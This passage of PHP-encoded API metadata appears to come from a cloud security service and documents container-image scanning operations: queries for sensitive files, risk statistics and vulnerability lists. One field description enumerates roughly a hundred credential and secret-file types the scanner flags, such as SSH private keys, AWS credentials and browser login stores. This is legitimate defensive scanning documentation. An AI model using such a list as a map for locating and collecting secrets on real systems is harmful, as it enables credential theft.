'query', 'style' => 'json', 'schema' => [ 'description' => 'The collection of scan scopes. Valid values:'."\n" ."\n" .'- **image**: image.'."\n" .'- **container**: container.', 'type' => 'array', 'items' => ['description' => 'The scan scope. Valid values:'."\n" ."\n" .'- **image**: image.'."\n" .'- **container**: container.', 'type' => 'string', 'required' => false, 'example' => 'container', 'title' => ''], 'required' => false, 'title' => '', 'example' => '', ], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content in the request and response. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the page to return. Minimum value: **1**. Default value: **1**.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries to return on each page in a paging query. Default value: 20.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'ImageUuid', 'in' => 'query', 'schema' => ['description' => 'The unique identifier of the image.'."\n" .'> Call the [DescribeGroupedContainerInstances](~~DescribeGroupedContainerInstances~~) operation of Container Registry. You can obtain the unique identifier of the container image from the **ImageUuid** response parameter.', 'type' => 'string', 'required' => false, 'example' => '850613a48999900f48417c7e6e9d****', 'title' => ''], ], [ 'name' => 'SensitiveKeyList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'title' => '', 'description' => 'The list of sensitive file keys.', 'type' => 'array', 'items' => ['title' => '', 'description' => 'The sensitive file key.', 'type' => 'string', 'example' => 'Token', 'required' => false], 'required' => false, 'maxItems' => 100, 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The response for querying sensitive files.', 'type' => 'object', 'properties' => [ 'SensitiveFileList' => [ 'description' => 'The list of sensitive files.', 'type' => 'array', 'items' => [ 'description' => 'The sensitive file information.', 'type' => 'object', 'properties' => [ 'RiskLevel' => ['description' => 'The risk level. Valid values:'."\n" ."\n" .'- **high**: high'."\n" ."\n" .'- **medium**: medium'."\n" ."\n" .'- **low**: low.', 'type' => 'string', 'example' => 'high', 'title' => ''], 'SensitiveFileKey' => ['description' => 'The sensitive file alerting type. Valid values:'."\n" ."\n" .'- **npm_token**: NPM access token'."\n" .'- **ftp_cfg**: FTP configuration'."\n" .'- **google\\_oauth_key**: Google OAuth Key'."\n" .'- **planetscale_passwd**: Planetscale password'."\n" .'- **github\\_ssh_key**: Github SSH key'."\n" .'- **msbuild\\_publish_profile**: MSBuild publish profile'."\n" .'- **fastly\\_cdn_token**: Fastly CDN token'."\n" .'- **ssh\\_private_key**: SSH private key'."\n" .'- **aws_cli**: AWS CLI credentials'."\n" .'- **cpanel_proftpd**: cPanel ProFTPd credentials'."\n" .'- **postgresql_passwd**: PostgreSQL password file'."\n" .'- **discord\\_client_cred**: Discord client credentials'."\n" .'- **rails_database**: Rails database configuration'."\n" .'- **aws\\_access_key**: AWS Access Key'."\n" .'- **esmtp_cfg**: ESMTP mail server configuration'."\n" .'- **docker\\_registry_cfg**: Docker image repository configuration'."\n" .'- **pem**: PEM'."\n" .'- **common_cred**: common credentials'."\n" .'- **sftp_cfg**: SFTP connection configuration'."\n" .'- **grafana_token**: Grafana token'."\n" .'- **slack_token**: Slack Token'."\n" .'- **ec\\_private_key**: EC private key'."\n" .'- **pypi_token**: PyPI upload token'."\n" .'- **finicity_token**: Finicity platform token'."\n" .'- **k8s\\_client_key**: Kubernetes client private key'."\n" .'- **git_cfg**: Git configuration'."\n" .'- **django_key**: Django key'."\n" .'- **jenkins_ssh**: Jenkins SSH configuration file'."\n" .'- **openssh\\_private_key**: OPENSSH private key'."\n" .'- **square_oauth**: Square OAuth credentials'."\n" .'- **typeform_token**: Typeform token'."\n" .'- **common\\_database_cfg**: common database connection configuration'."\n" .'- **wordpress\\_database_cfg**: WordPress database configuration'."\n" .'- **googlecloud\\_api_key**: Google Cloud API Key'."\n" .'- **vscode_sftp**: VSCode SFTP configuration'."\n" .'- **apache_htpasswd**: Apache htpasswd'."\n" .'- **planetscale_token**: Planetscale token'."\n" .'- **contentful\\_preview_token**: Contentful Preview token'."\n" .'- **php\\_database_cfg**: PHP application database password'."\n" .'- **atom\\_remote_sync**: Atom remote synchronization configuration'."\n" .'- **aws\\_session_token**: AWS session token'."\n" .'- **atom\\_sftp_cfg**: Atom SFTP configuration'."\n" .'- **asana\\_client\\_private_key**: Asana client private key'."\n" .'- **tencentcloud_ak**: third-party cloud SecretId'."\n" .'- **rsa\\_private_key**: RSA private key'."\n" .'- **github\\_personal_token**: Github Personal access token'."\n" .'- **pgp**: PGP encrypt file'."\n" .'- **stripe_skpk**: Stripe Secret Key'."\n" .'- **square_token**: Square access token'."\n" .'- **rails_carrierwave**: Rails Carrierwave file upload credentials'."\n" .'- **dbeaver\\_database_cfg**: DBeaver database configuration'."\n" .'- **robomongo_cred**: Robomongo credentials'."\n" .'- **github\\_oauth_token**: Github OAuth access token'."\n" .'- **pulumi_token**: Pulumi token'."\n" .'- **ventrilo_voip**: Ventrilo VoIP Server configuration'."\n" .'- **macos\\_keychain**: macOS Keychain'."\n" .'- **amazon\\_mws_token**: Amazon MWS Token'."\n" .'- **dynatrace_token**: Dynatrace token'."\n" .'- **java_keystore**: Java KeyStore'."\n" .'- **microsoft_sdf**: Microsoft SQL CE database'."\n" .'- **kubernetes\\_dashboard_cred**: Kubernetes Dashboard user credentials'."\n" .'- **atlassian_token**: Atlassian token'."\n" .'- **rdp**: Remote Desktop Protocol (RDP) connection'."\n" .'- **mailgun_key**: Mailgun Webhook Signing Key'."\n" .'- **mailchimp\\_api_key**: Mailchimp API Key'."\n" .'- **netrc_cfg**: .netrc configuration file'."\n" .'- **openvpn_cfg**: OpenVPN client configuration'."\n" .'- **github\\_refresh_token**: Github Refresh Token'."\n" .'- **salesforce**: Salesforce credentials'."\n" .'- **sendinblue**: Sendinblue token'."\n" .'- **pkcs\\_private_key**: PKCS#12 key'."\n" .'- **rubyonrails_passwd**: Ruby on Rails password file'."\n" .'- **filezilla_ftp**: FileZilla FTP configuration'."\n" .'- **databricks_token**: Databricks token'."\n" .'- **gitLab\\_personal_token**: GitLab Personal access token'."\n" .'- **rails\\_master_key**: Rails Master Key'."\n" .'- **sqlite**: SQLite3/SQLite database'."\n" .'- **firefox_logins**: Firefox logon configuration'."\n" .'- **mailgun\\_private_token**: Mailgun Private token'."\n" .'- **joomla_cfg**: Joomla configuration'."\n" .'- **hashicorp\\_terraform_token**: Hashicorp Terraform Token'."\n" .'- **jetbrains_ides**: Jetbrains IDEs configuration'."\n" .'- **heroku\\_api_key**: Heroku API key'."\n" .'- **messagebird_token**: MessageBird token'."\n" .'- **github\\_app_token**: Github App Token'."\n" .'- **hashicorp\\_vault_token**: Hashicorp Vault Token'."\n" .'- **pgp\\_private_key**: PGP private key'."\n" .'- **sshpasswd**: SSH password'."\n" .'- **huaweicloud_ak**: third-party cloud Secret Access Key'."\n" .'- **aws_s3cmd**: AWS S3cmd configuration'."\n" .'- **php_config**: PHP configuration'."\n" .'- **common\\_private_key**: common private key types'."\n" .'- **microsoft_mdf**: Microsoft SQL database'."\n" .'- **mediawiki_cfg**: MediaWiki configuration'."\n" .'- **jenkins_cred**: Jenkins credentials'."\n" .'- **rubygems_cred**: Rubygems credentials'."\n" .'- **clojars_token**: Clojars token'."\n" .'- **phoenix\\_web_passwd**: Phoenix Web credentials'."\n" .'- **puttygen\\_private_key**: PuTTYgen private key'."\n" .'- **google\\_oauth_token**: Google OAuth access token'."\n" .'- **rubyonrails_cfg**: Ruby On Rails database configuration'."\n" .'- **lob\\_api_key**: Lob API Key'."\n" .'- **pkcs_cred**: PKCS#12 certificate'."\n" .'- **otr\\_private_key**: OTR private key'."\n" .'- **contentful\\_delivery_token**: Contentful Delivery token'."\n" .'- **digital\\_ocean_tugboat**: Digital Ocean Tugboat configuration'."\n" .'- **dsa\\_private_key**: DSA private key'."\n" .'- **rails\\_app_token**: Rails App token'."\n" .'- **git_cred**: Git user credentials'."\n" .'- **newrelic\\_api_key**: New Relic User API Key'."\n" .'- **github_hub**: hub configuration that stores Github tokens'."\n" .'- **rubygem**: Rubygem token.', 'type' => 'string', 'example' => 'google_oauth_key', 'title' => ''], 'SensitiveFileName' => ['description' => 'The name of the sensitive file alerting type.', 'type' => 'string', 'example' => 'AccessKeyLeak', 'title' => ''], 'FirstScanTime' => ['description' => 'The timestamp of the first scan. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1663321552000', 'title' => ''], 'LastScanTime' => ['description' => 'The timestamp of the most recent scan. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1663321552000', 'title' => ''], 'Count' => ['description' => 'The number of times the sensitive file was detected by scans.', 'type' => 'integer', 'format' => 'int32', 'example' => '9', 'title' => ''], 'ClassKey' => ['description' => 'The classification key of the sensitive file.', 'type' => 'string', 'example' => 'password', 'title' => ''], 'ClassName' => ['description' => 'The classification name of the sensitive file.', 'type' => 'string', 'example' => 'password', 'title' => ''], 'UnprocessedNum' => ['description' => 'The number of unprocessed images.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'Advice' => ['description' => 'The hardening suggestion for the sensitive file check item.', 'type' => 'string', 'example' => 'PEM (Privacy Enhanced Mail) format is a common format for digital certificates. PEM files can contain certificates, public keys, private keys, and other sensitive information. When a PEM file is either unencrypted or protected with a weak password, or if the password has been compromise, it poses a significantly higher security risk. This detection rule aims to identify such PEM files.', 'title' => ''], 'Description' => ['description' => 'The description of the sensitive file check item.', 'type' => 'string', 'example' => 'Assess the risk based on business context and promptly remove any risky content.'."\n" ."\n", 'title' => ''], 'Status' => ['description' => 'The status of the sensitive file check item. Valid values:'."\n" .'- **0**: Unprocessed.'."\n" .'- **1**: Processed.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of entries returned per page. Default value: 20.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries.', 'type' => 'integer', 'format' => 'int32', 'example' => '149', 'title' => ''], 'Count' => ['description' => 'The number of entries returned on the current page.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'LastRowKey' => ['description' => 'The key of the last entry.', 'type' => 'string', 'example' => 'CAESGgoSChAKDGNvbXBsZXRlVGltZRABCgQiAggAGAAiQAoJAGYXFWIAAAAACjMDLgAAADFTNzMyZDMwMzAzMDM1Mzc3Njc4MzA2ODY5NmI2YTY1Nzg2NTcxNjE2N******', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Success' => ['description' => 'Indicates whether the query was successful. Valid values:'."\n" .'- **true**: successful'."\n" .'- **false**: failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The result code. A value of **200** indicates success. Other values indicate failure. You can use this field to determine the cause of the failure.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The detailed information about the error code.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request. Alibaba Cloud generates a unique ID for each request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '8D19A089-E6BC-5244-800C-7E590D50487F', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Query sensitive files', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImageSensitiveFileList'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeImageSensitiveFileList', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"SensitiveFileList\\": [\\n {\\n \\"RiskLevel\\": \\"high\\",\\n \\"SensitiveFileKey\\": \\"google_oauth_key\\",\\n \\"SensitiveFileName\\": \\"AccessKeyLeak\\",\\n \\"FirstScanTime\\": 1663321552000,\\n \\"LastScanTime\\": 1663321552000,\\n \\"Count\\": 9,\\n \\"ClassKey\\": \\"password\\",\\n \\"ClassName\\": \\"password\\",\\n \\"UnprocessedNum\\": 2,\\n \\"Advice\\": \\"PEM (Privacy Enhanced Mail) format is a common format for digital certificates. PEM files can contain certificates, public keys, private keys, and other sensitive information. When a PEM file is either unencrypted or protected with a weak password, or if the password has been compromise, it poses a significantly higher security risk. This detection rule aims to identify such PEM files.\\",\\n \\"Description\\": \\"Assess the risk based on business context and promptly remove any risky content.\\\\n\\\\n\\",\\n \\"Status\\": 0\\n }\\n ],\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 149,\\n \\"Count\\": 1,\\n \\"LastRowKey\\": \\"CAESGgoSChAKDGNvbXBsZXRlVGltZRABCgQiAggAGAAiQAoJAGYXFWIAAAAACjMDLgAAADFTNzMyZDMwMzAzMDM1Mzc3Njc4MzA2ODY5NmI2YTY1Nzg2NTcxNjE2N******\\"\\n },\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"8D19A089-E6BC-5244-800C-7E590D50487F\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', ], 'DescribeImageStatistics' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. The ID is a unique identifier that Alibaba Cloud generates for the request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '4E5BFDCF-B9DD-430D-9DA4-151BCB581C9D', 'title' => ''], 'InstanceCount' => ['description' => 'The number of container images in your assets. Only container images in Enterprise instances of Container Registry are counted.', 'type' => 'integer', 'format' => 'int32', 'example' => '5', 'title' => ''], 'RiskInstanceCount' => ['description' => 'The number of container images that have security risks in your assets. Only container images in Enterprise instances of Container Registry are counted.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query risk statistics information of container image assets', 'summary' => 'Queries the risk statistics information of container image assets.', 'description' => 'Security Center supports scanning container images only in **Enterprise instances** of Container Registry for security risks and provides statistics.'."\n" .'> Security Center does not support scanning container images in **default instances** of Container Registry for security risks and does not provide statistics for **default instances**.', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeImageStatistics'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeImageStatistics', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"4E5BFDCF-B9DD-430D-9DA4-151BCB581C9D\\",\\n \\"InstanceCount\\": 5,\\n \\"RiskInstanceCount\\": 2\\n}","type":"json"}]', ], 'DescribeImageVulList' => [ 'summary' => 'Queries the details of vulnerabilities detected by image security scans and the list of container images affected by the vulnerabilities.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasU76LC1'], ], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type of the request and response messages. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The type of vulnerability to query. Set the value to **cve**, which indicates container image vulnerabilities.', 'type' => 'string', 'required' => true, 'example' => 'cve', 'title' => ''], ], [ 'name' => 'Uuids', 'in' => 'query', 'schema' => ['description' => 'The UUIDs of asset instances. Separate multiple UUIDs with commas (,).', 'type' => 'string', 'required' => false, 'example' => '0004a32a0305a7f6ab5ff9600d47****', 'title' => ''], ], [ 'name' => 'Name', 'in' => 'query', 'schema' => ['description' => 'The name of the vulnerability to query.', 'type' => 'string', 'required' => false, 'example' => 'debian:10:CVE-2019-9893', 'title' => ''], ], [ 'name' => 'AliasName', 'in' => 'query', 'schema' => ['description' => 'The alias of the vulnerability to query.', 'type' => 'string', 'required' => false, 'example' => 'High severity vulnerability that affects org.eclipse.jetty:jetty-server', 'title' => ''], ], [ 'name' => 'StatusList', 'in' => 'query', 'schema' => ['description' => 'The fix status of the vulnerability. Valid values:'."\n" .'- **1**: unfixed'."\n" .'- **4**: being fixed'."\n" .'- **7**: fixed.', 'type' => 'string', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'Necessity', 'in' => 'query', 'schema' => ['description' => 'The priority level of vulnerability fixing. Valid values:'."\n" .'- **asap**: high-priority vulnerability'."\n" .'- **later**: medium-priority vulnerability'."\n" .'- **nntf**: low-priority vulnerability.', 'type' => 'string', 'required' => false, 'example' => 'asap', 'title' => ''], ], [ 'name' => 'Dealed', 'in' => 'query', 'schema' => ['description' => 'Specifies whether the vulnerability has been handled. Valid values:'."\n" .'- **y**: handled'."\n" .'- **n**: not handled.', 'type' => 'string', 'required' => false, 'example' => 'y', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the page to return in a paginated query. Default value: **1**, which indicates the first page.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'Settings for the number of vulnerabilities to display on each page in a paged query. Default value: **10**, which indicates that 10 vulnerabilities are displayed on each page.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '10', 'title' => ''], ], [ 'name' => 'RepoRegionId', 'in' => 'query', 'schema' => ['description' => 'The region ID of the container image repository.', 'type' => 'string', 'required' => false, 'example' => 'cn-hangzhou', 'title' => ''], ], [ 'name' => 'RepoInstanceId', 'in' => 'query', 'schema' => ['description' => 'The instance ID of the container image repository.', 'type' => 'string', 'required' => false, 'example' => 'i-qewqrqcsadf****', 'title' => ''], ], [ 'name' => 'RepoId', 'in' => 'query', 'schema' => ['description' => 'The ID of the container image repository.', 'type' => 'string', 'required' => false, 'example' => 'qew****', 'title' => ''], ], [ 'name' => 'RepoName', 'in' => 'query', 'schema' => ['description' => 'The name of the container image repository.', 'type' => 'string', 'required' => false, 'example' => 'libssh2', 'title' => ''], ], [ 'name' => 'RepoNamespace', 'in' => 'query', 'schema' => ['description' => 'The namespace of the container image repository.', 'type' => 'string', 'required' => false, 'example' => 'libssh2', 'title' => ''], ], [ 'name' => 'RepoName', 'in' => 'query', 'schema' => ['description' => 'The name of the container image repository.', 'type' => 'string', 'required' => false, 'example' => 'libssh2', 'title' => ''], ], [ 'name' => 'RegionId', 'in' => 'query', 'schema' => ['description' => 'The region ID of the instance.', 'type' => 'string', 'required' => false, 'example' => 'cn-hangzhou', 'title' => ''], ], [ 'name' => 'InstanceId', 'in' => 'query', 'schema' => ['description' => 'The ID of the asset instance.', 'type' => 'string', 'required' => false, 'example' => '1-qeqewqw****', 'title' => ''], ], [ 'name' => 'RepoId', 'in' => 'query', 'schema' => ['description' => 'The ID of the container image repository.', 'type' => 'string', 'required' => false, 'example' => 'qew****', 'title' => ''], ], [ 'name' => 'Tag', 'in' => 'query', 'schema' => ['description' => 'The tag of the container image.', 'type' => 'string', 'required' => false, 'example' => 'oval', 'title' => ''], ], [ 'name' => 'Digest', 'in' => 'query', 'schema' => ['description' => 'The unique identifier of the container image.', 'type' => 'string', 'required' => false, 'example' => '8f0fbdb41d3d1ade4ffdf21558443f4c03342010563bb8c43ccc09594d507012', 'title' => ''], ], [ 'name' => 'ClusterId', 'in' => 'query', 'schema' => ['description' => 'The ID of the container cluster.', 'type' => 'string', 'required' => false, 'example' => 'cc20a1024011c44b6a8710d6f8b****', 'title' => ''], ], [ 'name' => 'ScanRange', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The collection of scan ranges.', 'type' => 'array', 'items' => ['description' => 'The scan range. Valid values:'."\n" ."\n" .'- **container**: container'."\n" .'- **image**: image.', 'type' => 'string', 'required' => false, 'example' => 'container', 'title' => ''], 'required' => false, 'maxItems' => 2, 'title' => '', 'example' => '', ], ], [ 'name' => 'ClusterName', 'in' => 'query', 'schema' => ['description' => 'The name of the cluster.', 'type' => 'string', 'required' => false, 'example' => 'docker-law'."\n", 'title' => ''], ], [ 'name' => 'ContainerId', 'in' => 'query', 'schema' => ['description' => 'The ID of the container.', 'type' => 'string', 'required' => false, 'example' => 'c08d5fc1a329a4b88950a253d082f****'."\n", 'title' => ''], ], [ 'name' => 'Pod', 'in' => 'query', 'schema' => ['description' => 'The pod.', 'type' => 'string', 'required' => false, 'example' => '22222-7xsqq'."\n", 'title' => ''], ], [ 'name' => 'Namespace', 'in' => 'query', 'schema' => ['description' => 'The namespace.', 'type' => 'string', 'required' => false, 'example' => 'test-002'."\n", 'title' => ''], ], [ 'name' => 'Image', 'in' => 'query', 'schema' => ['description' => 'The name of the container image.', 'type' => 'string', 'required' => false, 'example' => 'registry.cn-wulanchabu.aliyuncs.com/sas_test/huxin-test-001:nuxeo6-****'."\n", 'title' => ''], ], [ 'name' => 'RuleTag', 'in' => 'query', 'schema' => ['description' => 'The vulnerability tag. Valid values:'."\n" ."\n" .'- **AI**: vulnerability related to AI components.', 'type' => 'string', 'required' => false, 'example' => 'AI', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'D6B20156-49B0-5CF0-B14D-7ECA4B50DAAB', 'title' => ''], 'PageSize' => ['description' => 'The number of vulnerabilities displayed on each page in a paged query. Default value: **10**.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'TotalCount' => ['description' => 'The total number of vulnerabilities returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'VulRecords' => [ 'description' => 'The list of vulnerability information.', 'type' => 'array', 'items' => [ 'description' => 'The vulnerability information.', 'type' => 'object', 'properties' => [ 'CanUpdate' => ['description' => 'Indicates whether the software package that causes the vulnerability can be upgraded through Security Center. Valid values:'."\n" ."\n" .'- **true**: Supported.'."\n" .'- **false**: Not supported.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Type' => ['description' => 'The type of vulnerability queried. The value is fixed as cve, which indicates container image vulnerabilities.', 'type' => 'string', 'example' => 'cve', 'title' => ''], 'Status' => ['description' => 'The fix status of the vulnerability. Valid values:'."\n" .'- **1**: unfixed'."\n" .'- **7**: fixed.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'ModifyTs' => ['description' => 'The timestamp when the vulnerability record was last updated. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1580808765000', 'title' => ''], 'ImageDigest' => ['description' => 'The unique identifier of the container image.', 'type' => 'string', 'example' => '8f0fbdb41d3d1ade4ffdf21558443f4c03342010563bb8c43ccc09594d507012', 'title' => ''], 'PrimaryId' => ['description' => 'The ID of the vulnerability.', 'type' => 'integer', 'format' => 'int64', 'example' => '782661', 'title' => ''], 'Tag' => ['description' => 'The tag of the container image vulnerability.', 'type' => 'string', 'example' => 'oval', 'title' => ''], 'RepoNamespace' => ['description' => 'The namespace of the container image repository.', 'type' => 'string', 'example' => 'default', 'title' => ''], 'RepoName' => ['description' => 'The name of the container image repository.', 'type' => 'string', 'example' => 'varnish', 'title' => ''], 'Related' => ['description' => 'The details of the related vulnerability.', 'type' => 'string', 'example' => 'CVE-2019-9893', 'title' => ''], 'FirstTs' => ['description' => 'The timestamp of the first scan. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1620752053000', 'title' => ''], 'LastTs' => ['description' => 'The timestamp of the latest scan. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1631779996000', 'title' => ''], 'Necessity' => ['description' => 'The priority level of vulnerability fixing. Valid values:'."\n" .'- **asap**: high-priority vulnerability'."\n" .'- **later**: medium-priority vulnerability'."\n" .'- **nntf**: low-priority vulnerability.', 'type' => 'string', 'example' => 'asap', 'title' => ''], 'Uuid' => ['description' => 'The UUID of the server.', 'type' => 'string', 'example' => '0004a32a0305a7f6ab5ff9600d47****', 'title' => ''], 'AliasName' => ['description' => 'The alias of the vulnerability.', 'type' => 'string', 'example' => 'CVE-2018-25010:libwebp up to 1.0.0 ApplyFilter out-of-bounds read', 'title' => ''], 'Name' => ['description' => 'The name of the vulnerability.', 'type' => 'string', 'example' => 'debian:10:CVE-2019-9893', 'title' => ''], 'Layers' => [ 'description' => 'The list of container image layers.', 'type' => 'array', 'items' => ['description' => 'The list of container image layers.', 'type' => 'string', 'example' => '["null"]', 'title' => ''], 'title' => '', 'example' => '', ], 'ExtendContentJson' => [ 'description' => 'The extended content of the vulnerability information.', 'type' => 'object', 'properties' => [ 'OsRelease' => ['description' => 'The release version of the operating system corresponding to the container image.', 'type' => 'string', 'example' => '10.9', 'title' => ''], 'Os' => ['description' => 'The name of the operating system.', 'type' => 'string', 'example' => 'debian', 'title' => ''], 'RpmEntityList' => [ 'description' => 'The list of software packages that cause the vulnerability.', 'type' => 'array', 'items' => [ 'description' => 'The information about the software package that causes the vulnerability.', 'type' => 'object', 'properties' => [ 'MatchList' => [ 'description' => 'The list of matched rule details.', 'type' => 'array', 'items' => ['description' => 'The details of matched rules. Multiple rule details are separated by commas (,).', 'type' => 'string', 'example' => '["libstdc++ version less than 8.5.0-4.el8_5"]', 'title' => ''], 'example' => '["libseccomp2 version less than equals 2.3.3-4"]', 'title' => '', ], 'Layer' => ['description' => 'The SHA256 value of the container image layer digest.', 'type' => 'string', 'example' => 'b1f5b9420803ad0657cf21566e3e20acc08581e7f22991249ef3aa80b8b1c587', 'title' => ''], 'FullVersion' => ['description' => 'The full version number of the software package.', 'type' => 'string', 'example' => '2.3.3-4', 'title' => ''], 'Version' => ['description' => 'The version number of the software package.', 'type' => 'string', 'example' => '2.3.3-4', 'title' => ''], 'MatchDetail' => ['description' => 'The details of the vulnerability match.', 'type' => 'string', 'example' => 'libseccomp2 version less than equals 2.3.3-4', 'title' => ''], 'Path' => ['description' => 'The path of the software that contains the vulnerability.', 'type' => 'string', 'example' => '/usr/lib64/libssh2.so.1', 'title' => ''], 'Name' => ['description' => 'The name of the software package.', 'type' => 'string', 'example' => 'libseccomp2', 'title' => ''], 'UpdateCmd' => ['description' => 'The command to fix the vulnerability.', 'type' => 'string', 'example' => 'apt-get update && apt-get install libseccomp2 --only-upgrade', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'CanFix' => ['description' => 'Indicates whether the vulnerability can be fixed from the console. Valid values:'."\n" ."\n" .'- **yes**: can be fixed'."\n" .'- **no**: cannot be fixed.', 'type' => 'string', 'example' => 'yes', 'title' => ''], 'ClusterId' => ['description' => 'The ID of the cluster.', 'type' => 'string', 'example' => 'c08d5fc1a329a4b88950a253d082f1****'."\n", 'title' => ''], 'ClusterName' => ['description' => 'The name of the cluster.', 'type' => 'string', 'example' => 'docker-law'."\n", 'title' => ''], 'Pod' => ['description' => 'The pod.', 'type' => 'string', 'example' => '22222-7xsqq'."\n", 'title' => ''], 'Namespace' => ['description' => 'The namespace.', 'type' => 'string', 'example' => 'test-002'."\n", 'title' => ''], 'Image' => ['description' => 'The name of the image.', 'type' => 'string', 'example' => 